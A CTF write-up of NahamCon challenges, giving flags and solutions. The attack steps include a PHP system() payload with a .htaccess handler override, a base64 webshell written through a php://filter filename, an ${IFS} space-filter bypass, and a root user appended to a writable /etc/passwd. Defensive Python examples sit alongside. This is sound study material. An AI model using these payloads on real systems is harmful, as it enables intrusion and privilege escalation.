Technical Support

Author: @JohnHammond#6971

Want to join the party of GIFs, memes and emoji spam? Or just want to ask a question for technical support regarding any challenges in the CTF? Join us in the Discord in the #nahamcon-ctf-general channel! You might just find a flag on the Discord server!

Go to the Discord server, open the #nahamcon-ctf-general channel, and the flag is visible in the channel description

2022-12-17-172256_1335x78_scrot

flag → flag{a98373a74abb8c5ebb8f5192e034a91c}

Baby’s First Heartbleed

Author: @JohnHammond#6971

Hey kids!! Wanna learn how to hack??!?! Start here to foster your curiosity!

Start the machine, and connect to it using nc

⌨️ nc challenge.nahamcon.com 31985

I really just guessed this one: when it asks for a string, type anything (for example “hello”), and when it asks for a length, type a high number
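To show what the "string plus oversized length" input exploits and what the service should have checked, here is an added example written for this writeup (not the challenge's own code). The memory layout, buffer size and secret are constructed for illustration:

```python
# Added example (not the challenge's code): a toy heartbeat responder with the
# classic length-trust bug beside the check that fixes it.
from typing import Optional

# Constructed "process memory": a 16-byte echo buffer followed by a secret.
BUF_SIZE = 16
MEMORY = bytearray(b"\x00" * BUF_SIZE + b"flag{constructed_example}" + b"\x00" * 8)


def vulnerable_heartbeat(payload: bytes, claimed_len: int) -> bytes:
    """Echo back `claimed_len` bytes, trusting the client-supplied length.

    The server copies the payload into the buffer, then reads `claimed_len`
    bytes starting at the buffer. Nothing ties claimed_len to len(payload),
    so a large value reads past the buffer into the secret.
    """
    MEMORY[0:len(payload)] = payload          # same-length slice: no resize
    return bytes(MEMORY[0:claimed_len])       # bug: over-read


def hardened_heartbeat(payload: bytes, claimed_len: int) -> Optional[bytes]:
    """Echo only when the claimed length matches the bytes actually received."""
    if len(payload) > BUF_SIZE:
        return None                           # would overflow the buffer
    if claimed_len != len(payload):
        return None                           # length field disagrees with data
    MEMORY[0:len(payload)] = payload
    return bytes(MEMORY[0:claimed_len])


if __name__ == "__main__":
    print(vulnerable_heartbeat(b"hello", 48))   # leaks the secret after "hello"
    print(hardened_heartbeat(b"hello", 48))     # None: request rejected
    print(hardened_heartbeat(b"hello", 5))      # b"hello"
```

The fix is the one the real Heartbleed patch made: reject the record when the length field exceeds the data that arrived, rather than trusting the peer's number.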

You should see the flag appear in the server response:

2022-12-17-172914_1888x1032_scrot

flag → flag{bfca3d71260e581ba366dca054f5c8e5}

Read The Rules

Author: @JohnHammond#6971

Please follow the rules for this CTF!

Go to the rules page and open DevTools (or view-source); the flag is in an HTML comment at the very bottom of the page

2022-12-17-173352_943x617_scrot

flag → flag{90bc54705794a62015369fd8e86e557b}

Hashstation

Author: @JohnHammond#6971

Below is a SHA256 hash! Can you determine what the original data was, before it was hashed?

705db0603fd5431451dab1171b964b4bd575e2230f40f4c300d70df6e65f5f1c

You could probably do it with hashcat, but I’m lazy so I’ll just use crackstation.net

2022-12-17-190623_1056x434_scrot

flag → flag{awesome}

Catscii

Author: @JohnHammond#6971

Do you know what the cat command does in the Linux command-line?

Download the file and cat its content

⌨️ cat catscii

2022-12-17-190848_1888x1032_scrot

flag → flag{258da40ab06be7c99099d603a3b3ccb1}

Banjo

Author: @JohnHammond#6971

Oooh, that classic twang! The banjo is one of my favorite strings instruments!

Download the image, and use the strings command on it, then grep flag

⌨️ strings banjo.jpg | grep flag

2022-12-17-191103_1888x1032_scrot

flag → flag{ce4e687e575392ae242f0e41c888de11}

Arjeebee

Author: @JohnHammond#6971

What is the rgb(19,55,175) color in its hexadecimal representation?

Go to rgbtohex.net and enter the RGB values

2022-12-17-191342_762x467_scrot

flag → flag{#1337AF}

Way 2 Basic

Author: @JohnHammond#6971

Here is some data represented in base 2. What is this data represented as ASCII text?

01100110 01101100 01100001 01100111 01111011 00111001 00110000 01100011 00110110 01100101 01100010 01100101 00111001 00110100 00110001 00110101 00110110 00110001 01100011 01100110 01100001 01100100 01100110 01100001 01100101 00110001 00110111 00110000 01100001 00111000 01100110 00110000 01100101 01100001 00110010 00110101 00110010 01111101

Go to any binary-to-text website (base 2 and binary are the same thing)

2022-12-17-191609_646x566_scrot

flag → flag{90c6ebe941561cfadfae170a8f0ea252}

Byepass

Author: @JohnHammond#6971

Help yourself Say Goodbye to days gone by with our easy online service! Upload your photos to capture the memory, cherish them with friends and family, and savor the time we have together!

Retrieve the flag out of the root of the filesystem /flag.txt.

Since we have the website’s source code, we can see that there is an upload form at /save_memories.php

We can also see which file extensions are blacklisted

$ext_denylist = array(
    "php",
    "php2",
    "php3",
    "php4",
    "php5",
    "php6",
    "php7",
    "phps",
    "phps",
    "pht",
    "phtm",
    "phtml",
    "pgif",
    "shtml",
    "phar",
    "inc",
    "hphp",
    "ctp",
);

The danger when using blacklists is forgetting something, and that’s what happened here: the .php16 extension is not filtered
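To make the blacklist-versus-allowlist point concrete, here is an added example (not the challenge's own PHP) that reimplements the challenge's $ext_denylist next to the allowlist check that would have refused the bypass. The sample filenames are constructed:

```python
# Added example (not the challenge's code): denylist vs allowlist for uploads.
import os

# Copied from the challenge's $ext_denylist (as a set, so the duplicate
# "phps" collapses). Anything not listed here gets through.
EXT_DENYLIST = {
    "php", "php2", "php3", "php4", "php5", "php6", "php7", "phps",
    "pht", "phtm", "phtml", "pgif", "shtml", "phar", "inc", "hphp", "ctp",
}

# Allowlist: only the image types the "memories" feature actually needs.
EXT_ALLOWLIST = {"jpg", "jpeg", "png", "gif"}


def extension(filename: str) -> str:
    """Lowercased final extension of the basename ('' if there is none)."""
    base = os.path.basename(filename)
    if "." not in base:
        return ""
    return base.rpartition(".")[2].lower()


def denylist_allows(filename: str) -> bool:
    """The challenge's logic: accept unless the extension is on the list."""
    return extension(filename) not in EXT_DENYLIST


def allowlist_allows(filename: str) -> bool:
    """Hardened logic: accept only a known-safe extension, and only as the
    last one, so 'shell.jpg.php' and '.htaccess' are both refused."""
    ext = extension(filename)
    return ext != "" and ext in EXT_ALLOWLIST


if __name__ == "__main__":
    for name in ["photo.JPG", "exploit.php16", ".htaccess", "shell.jpg.php"]:
        print(f"{name:16} denylist={denylist_allows(name)!s:5} "
              f"allowlist={allowlist_allows(name)}")
```

Even with an allowlist, the upload directory should not be served with a PHP handler at all (and should not honour per-directory .htaccess overrides), so that a mistake in name validation cannot turn into code execution.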

The challenge’s description tells us that the flag is located in the root of the filesystem, so we can directly try to cat it using php

First, let’s create an exploit.php16 file, with our malicious code inside

<?php system("cat ../../../../../flag.txt"); ?>

Upload it, and read it by going to /exploit.php16

2022-12-17-203048_930x1026_scrot

aaaaaand… it’s blank

This can happen for two reasons:

  • It did not manage to cat the file
  • PHP engine is not enabled

Assuming flag.txt exists, it is because the php engine is not enabled

By looking at the response to our request, we know it’s running Apache, so we can try to upload a .htaccess file that will enable PHP

.htaccess:

AddType application/x-httpd-php .php16
php_flag engine on

Upload it, and check it by going to /.htaccess

2022-12-17-203816_929x261_scrot

We get a 403 Forbidden response, which is a good sign, because by default, Apache prevents users from reading files such as .htaccess

Now, let’s re-upload our php16 file

2022-12-17-204028_834x171_scrot

The PHP is now executed rather than served as plain text

flag → flag{32697ad7acd2d4718758d9a5ee42965d}

Use After Exit

Author: @carlopolop#3938

It's as easy as it looks, isn't it?

When we visit the website, we can see the following code:

<?php
error_reporting(0);
if (isset($_POST['submit'])) {
    $file_name = urldecode($_FILES['file']['name']);
    $tmp_path = $_FILES['file']['tmp_name'];
    if(strpos($file_name, ".jpg") == false){
        echo "Invalid file name";
        exit(1);
    }
    $content = file_get_contents($tmp_path);
    $all_content = '<?php exit(0);'. $content . '?>';
    $handle = fopen($file_name, "w");
    fwrite($handle, $all_content);
    fclose($handle);
    echo "Done.";
}
else{
    show_source(__FILE__);
}
?>

So we have two things to bypass:

  • File needs to have .jpg in its name
  • <?php exit(0); ?> will be written at the beginning of the file

The first condition is very easy to bypass, since strpos checks whether “.jpg” appears anywhere in the file name, not only at the end, so we can upload exploit.jpg.php

The second condition is more annoying, but by reading the fopen manual and the supported wrappers page, we understand that PHP wrappers such as php://filter can be used as the file name passed to fopen

This is useful because, looking at the top of the script, the file name is passed through the urldecode() function

That lets us put special characters such as / and : in our file name

To prevent the exit(0) from bothering us, we use the php://filter/convert.base64-decode wrapper: base64-decoding the <?php exit(0); prefix produces a few junk bytes (^+t) instead of PHP code, which is exactly what we want

Let’s base64 encode a php “webshell”:

<?php system($_GET["cmd"]); ?>
PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+

and paste this into a file that we’ll call

⌨️ php%3A%2F%2Ffilter%2Fconvert.base64-decode%2Fresource%3Dshell.jpg.php

that way, when it will be passed through the urldecode() function, the filename will look like this

⌨️ php://filter/convert.base64-decode/resource=shell.jpg.php

The script will then decode and write this to shell.jpg.php:

<?php exit(0); PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+ ?>

which will look like this after decoding

^+t<?php system($_GET["cmd"]); ?>

Now that we’ve got our webshell, we can get the flag from user’s home by navigating to /shell.jpg.php?cmd=cat ../../../../home/user/flag.txt
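The two weaknesses chained here (a substring check instead of a suffix check, and a url-decoded name that may contain a stream wrapper) are both fixable in a few lines. The following is an added example written for this writeup, not the challenge's script: it mirrors the original strpos test to show its loose-comparison behaviour, then validates the name the way the script should have. Sample names are copied from the writeup or constructed:

```python
# Added example (not the challenge's code): upload name validation.
from typing import Optional, Union
from urllib.parse import unquote

ALLOWED_SUFFIXES = (".jpg", ".jpeg")


def strpos(haystack: str, needle: str) -> Union[int, bool]:
    """Mimic PHP strpos(): index of the match, or False when absent."""
    idx = haystack.find(needle)
    return False if idx == -1 else idx


def original_check_accepts(name: str) -> bool:
    """Mirror of `if (strpos($file_name, ".jpg") == false) reject`.

    The loose == treats 0 as false, so a name that starts with ".jpg" is
    rejected, while ".jpg" anywhere else in the name is accepted, even
    when the real extension is .php.
    """
    return not (strpos(name, ".jpg") == False)  # noqa: E712 (bug kept on purpose)


def safe_upload_name(raw_name: str) -> Optional[str]:
    """Return the name to write to, or None if the upload must be refused."""
    name = unquote(raw_name)            # the script url-decodes once; so do we
    if name in ("", ".", ".."):
        return None
    # Any scheme, separator or NUL means a wrapper (php://filter/...) or a
    # path, neither of which belongs in a user-supplied file name.
    if "://" in name or "/" in name or "\\" in name or "\x00" in name:
        return None
    # The allowed extension must be the *last* one.
    if not name.lower().endswith(ALLOWED_SUFFIXES):
        return None
    return name


if __name__ == "__main__":
    wrapper = "php%3A%2F%2Ffilter%2Fconvert.base64-decode%2Fresource%3Dshell.jpg.php"
    print(original_check_accepts("shell.jpg.php"))   # True  (accepted: bug)
    print(safe_upload_name(wrapper))                 # None  (refused)
    print(safe_upload_name("shell.jpg.php"))         # None  (refused)
    print(safe_upload_name("photo.JPG"))             # photo.JPG
```

Server-side, the stronger fix is to never open a user-controlled name at all: generate a random file name, write into a directory with no script handler, and keep the client's name only as metadata.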

2022-12-17-202338_930x1026_scrot

flag → flag{ab5f69d6cc412345387a0ca3a4700398}

Padlock

Author: @birch#9901

I forgot the combination to my pad lock :(

First step is to run the binary, and see how it acts

2022-12-17-230325_551x808_scrot

It asks for a passcode, then probably compares it with the right passcode

We’ll throw it into IDA and press F5 to generate pseudocode

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v5; // [rsp+38h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  print_lock(63LL, 63LL, 63LL, 63LL);
  printf("Please enter the passcode: ");
  __isoc99_fscanf(_bss_start, "%s", s);
  printf("The passcode you entered was: %s\n", s);
  replace(s, 51LL, 101LL);
  replace(s, 95LL, 32LL);
  replace(s, 48LL, 111LL);
  replace(s, 52LL, 97LL);
  if ( strlen(s) == 38 )
  {
    if ( !strcmp("master locks arent vry strong are they", s) )
    {
      replace(s, 101LL, 51LL);
      replace(s, 32LL, 95LL);
      replace(s, 111LL, 48LL);
      replace(s, 97LL, 52LL);
      unlock(s);
    }
  }
  else
  {
    printf("Not quite!");
  }
  return 0;
}

We can see that it takes our input, then replaces some values and compares it with the string “master locks arent vry strong are they”

The numeric arguments to replace() are hard to read, so we select them and press R (which shows them as their character values)

The pseudocode now looks like this

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[40]; // [rsp+10h] [rbp-30h] BYREF
  unsigned __int64 v5; // [rsp+38h] [rbp-8h]

  v5 = __readfsqword(0x28u);
  print_lock('?', '?', '?', '?');
  printf("Please enter the passcode: ");
  __isoc99_fscanf(_bss_start, "%s", s);
  printf("The passcode you entered was: %s\n", s);
  replace(s, '3', 'e');
  replace(s, '_', ' ');
  replace(s, '0', 'o');
  replace(s, '4', 'a');
  if ( strlen(s) == 38 )
  {
    if ( !strcmp("master locks arent vry strong are they", s) )
    {
      replace(s, 'e', '3');
      replace(s, ' ', '_');
      replace(s, 'o', '0');
      replace(s, 'a', '4');
      unlock(s);
    }
  }
  else
  {
    printf("Not quite!");
  }
  return 0;
}

We can see that it takes our input, “unleetifies” it (replaces 3 with e, _ with space, 0 with o and 4 with a), compares the result with the passcode, re-applies the leet substitutions, and then calls the unlock() function

So, we just have to run the binary and enter the following passcode:

m4st3r_l0cks_4r3nt_vry_str0ng_4r3_th3y
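To confirm the passcode offline before typing it into the binary, here is an added example (not the challenge's binary) that re-implements the replace()/strlen/strcmp logic recovered from the pseudocode and works the check backwards from the target string:

```python
# Added example (not the challenge's code): the Padlock check in Python.
from typing import List, Tuple

# (old, new) pairs in the order main() applies them before the comparison.
UNLEET_RULES: List[Tuple[str, str]] = [("3", "e"), ("_", " "), ("0", "o"), ("4", "a")]
TARGET = "master locks arent vry strong are they"
EXPECTED_LEN = 38


def replace(s: str, old: str, new: str) -> str:
    """Equivalent of the binary's replace(s, old, new): swap every occurrence."""
    return s.replace(old, new)


def unleetify(s: str) -> str:
    """The four replace() calls that run before strlen/strcmp."""
    for old, new in UNLEET_RULES:
        s = replace(s, old, new)
    return s


def leetify(s: str) -> str:
    """The inverse pass main() runs on the buffer before calling unlock(s)."""
    for old, new in UNLEET_RULES:
        s = replace(s, new, old)
    return s


def passes_check(candidate: str) -> bool:
    """True if the binary would reach unlock() for this input."""
    s = unleetify(candidate)
    return len(s) == EXPECTED_LEN and s == TARGET


def derive_passcode() -> str:
    """Leetify the comparison string and verify it satisfies the check."""
    candidate = leetify(TARGET)
    if not passes_check(candidate):
        raise RuntimeError("derived candidate does not pass the check")
    return candidate


if __name__ == "__main__":
    print(derive_passcode())   # m4st3r_l0cks_4r3nt_vry_str0ng_4r3_th3y
```

Note that the plain phrase also passes, since unleetify leaves e, space, o and a untouched; the binary then re-leetifies the buffer before unlock(), which is why the leet form is the one that matters for the flag.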

2022-12-17-231231_758x783_scrot

flag → flag{264cec034faef71c642de1721ea26b1f}

The Space Between Us

Author: @JohnHammond#6971

I've never felt this close to a character before. I hope the feeling is mutual...

Escalate your privileges and retrieve the flag out of root's home directory.

When we connect to the machine using netcat, we see that every space is filtered out of our commands:

2022-12-17-231433_634x459_scrot

So, the first step is finding a way to execute commands with spaces

And to do that, there is a shell variable that is set by default on Linux: ${IFS} (the internal field separator, whose default value is whitespace)

For example, to execute ls -la, we will have to write ls${IFS}-la

Now that we know this, we can list the content of the folder

2022-12-17-231629_567x259_scrot

We can see a README.md file, let’s take a look at it

2022-12-17-231714_494x197_scrot

It says that there is a misconfiguration in the filesystem, so we can start taking a look around

After spending a good hour enumerating every file and its permissions, I see that /etc/passwd is writable

2022-12-17-231901_556x99_scrot

We are going to add a user to the file, with UID 0 and /root as its home directory

First, we need to generate a password hash for the user

⌨️ openssl passwd hack

Then, add a new line to the passwd file using echo (because nano and vim aren’t working)

⌨️ echo${IFS}"hacker:ZUVbo0DtkXUXw:0:0:root:/root:/bin/bash">>/etc/passwd

2022-12-17-182345_1888x1032_scrot

Of course, we still can’t use spaces so we use ${IFS}

Now, we can read /root/flag.txt as this user using su

⌨️ echo${IFS}hack${IFS}|${IFS}su${IFS}-${IFS}hacker${IFS}-c${IFS}"cat</root/flag.txt"

2022-12-17-182532_1888x1032_scrot

flag → flag{59af40c07bc6f02b457aa4c15543da2d}
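From the defender's side, the two conditions this box relied on (a writable /etc/passwd and a second UID-0 account with a hash stored directly in the file) are easy to audit. The following is an added example written for this writeup, not part of the original; the passwd content is constructed, with the line appended above included so the checks have something to find:

```python
# Added example (not from the writeup): audit /etc/passwd content and mode.
import os
import stat
from typing import Dict, List

# Constructed sample, including the entry the writeup appends.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
user:x:1000:1000:user:/home/user:/bin/bash
hacker:ZUVbo0DtkXUXw:0:0:root:/root:/bin/bash
"""

# Password-field values that mean "look in /etc/shadow" or "locked".
SHADOWED_OR_LOCKED = {"x", "*", "!", "!!"}


def parse_passwd(text: str) -> List[Dict]:
    """Parse passwd lines into dicts; malformed lines are kept and flagged."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        try:
            if len(fields) != 7:
                raise ValueError("wrong field count")
            name, pw, uid, gid, _gecos, home, shell = fields
            entries.append({"line": lineno, "name": name, "pw": pw,
                            "uid": int(uid), "gid": int(gid),
                            "home": home, "shell": shell, "malformed": False})
        except ValueError:
            entries.append({"line": lineno, "raw": line, "malformed": True})
    return entries


def passwd_findings(text: str) -> List[str]:
    """Findings for extra UID-0 accounts, empty passwords and inline hashes."""
    findings = []
    for e in parse_passwd(text):
        if e["malformed"]:
            findings.append(f"line {e['line']}: malformed entry")
            continue
        if e["uid"] == 0 and e["name"] != "root":
            findings.append(f"line {e['line']}: extra UID-0 account {e['name']!r}")
        if e["pw"] == "":
            findings.append(f"line {e['line']}: empty password for {e['name']!r}")
        elif e["pw"] not in SHADOWED_OR_LOCKED and not e["pw"].startswith("!"):
            findings.append(f"line {e['line']}: hash stored in passwd for {e['name']!r}")
    return findings


def mode_findings(path: str, mode: int) -> List[str]:
    """Flag group- or world-writable bits on a st_mode value."""
    findings = []
    if mode & stat.S_IWOTH:
        findings.append(f"{path} is world-writable")
    if mode & stat.S_IWGRP:
        findings.append(f"{path} is group-writable")
    return findings


if __name__ == "__main__":
    # Run against the constructed sample, then the live file if readable.
    for f in passwd_findings(SAMPLE_PASSWD):
        print("sample:", f)
    if os.path.exists("/etc/passwd"):
        with open("/etc/passwd") as fh:
            live = fh.read()
        for f in passwd_findings(live) + mode_findings("/etc/passwd", os.stat("/etc/passwd").st_mode):
            print("live:", f)
```

A hash in the second field is honoured by traditional login paths, which is why an appended line with a known hash works; a file integrity tool or a periodic check like this one catches both the write and the new root-equivalent account.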

Conclusion

Overall, I liked this CTF; there were some very interesting rooms and I learned new things, so that’s a W

Thanks to everyone who participated and to my tm8 b0unce

certificate

2022-12-17-232956_1888x1032_scrot

1479 pts - 53/1658 (my username at the time was 99makarov)